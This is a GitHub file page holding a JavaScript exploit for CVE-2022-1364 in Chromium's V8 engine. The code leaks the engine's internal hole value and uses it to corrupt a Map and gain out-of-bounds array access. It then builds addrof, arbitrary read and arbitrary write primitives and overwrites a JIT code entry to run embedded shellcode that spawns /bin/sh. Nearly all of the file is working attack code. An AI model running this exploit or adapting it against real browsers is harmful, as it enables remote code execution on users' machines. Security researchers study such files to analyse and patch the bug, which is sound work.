-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathcve-2022-1364.js
123 lines (97 loc) · 2.16 KB
/
cve-2022-1364.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
/*
CVE-2022-1364
HEAD @ 7a5f4f55aa58ab5ddf4349b415906d45b34777f3
https://bugs.chromium.org/p/chromium/issues/detail?id=1315901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2022-1364
*/
var bs = new ArrayBuffer(8);
var fs = new Float64Array(bs);
var is = new BigUint64Array(bs);
function ftoi(val) {
fs[0] = val;
return is[0];
}
function itof(val) {
is[0] = val;
return fs[0];
}
/* execve("/bin/sh", 0, 0); */
const shell = () => {
return [
1.9711828979523134e-246,
1.9562205631094693e-246,
1.9557819155246427e-246,
1.9711824228871598e-246,
1.971182639857203e-246,
1.9711829003383248e-246,
1.9895153920223886e-246,
1.971182898881177e-246
];
};
for (let i = 0; i < 100000; i++)
shell();
function foo() {
const _x = a => (a => a.x())(a);
const _y = (a, b) => b.y(a, b, 1);
const _z = i => {
Error.prepareStackTrace = (_, x) => x[i].getThis();
return Error().stack;
};
function X() {}
X.prototype.x = () => {
let z = _z(3);
z[0] = 0;
e = { x: z, y: _z(3) };
};
X.prototype.y = function(a, b) {
'use strict';
_x.call(arguments, b);
return arguments[a];
}
let e = null;
let x = new X();
for (let i = 0; i < 10000; i++)
_y(1, x);
delete e.x[0];
return e.y[0];
}
function bar() {
let hole = foo();
let m = new Map();
m.set(1, 1);
m.set(hole, 1);
m.delete(hole);
m.delete(hole);
m.delete(1);
let a = new Array(1.1, 2.2);
m.set(16, -1);
m.set(a, 1337);
return a;
}
let oob = bar();
/* flt.elements @ oob[7] */
/* obj.elements @ oob[19] */
let flt = [1.1];
let tmp = {a: 1};
let obj = [tmp];
function addrof(o) {
let a = ftoi(oob[19]) & 0xffffffffn;
let b = ftoi(oob[7]) >> 32n;
oob[7] = itof((b << 32n) + a);
obj[0] = o;
return (ftoi(flt[0]) & 0xffffffffn) - 1n;
}
function read(p) {
let a = ftoi(oob[7]) >> 32n;
oob[7] = itof((a << 32n) + p - 8n + 1n);
return ftoi(flt[0]);
}
function write(p, x) {
let a = ftoi(oob[7]) >> 32n;
oob[7] = itof((a << 32n) + p - 8n + 1n);
flt[0] = itof(x);
}
let code = (read(addrof(shell) + 0x18n) - 1n) & 0xffffffffn;
let entry = (read(code + 0x10n));
write(code + 0x10n, entry + 0x69n);
shell();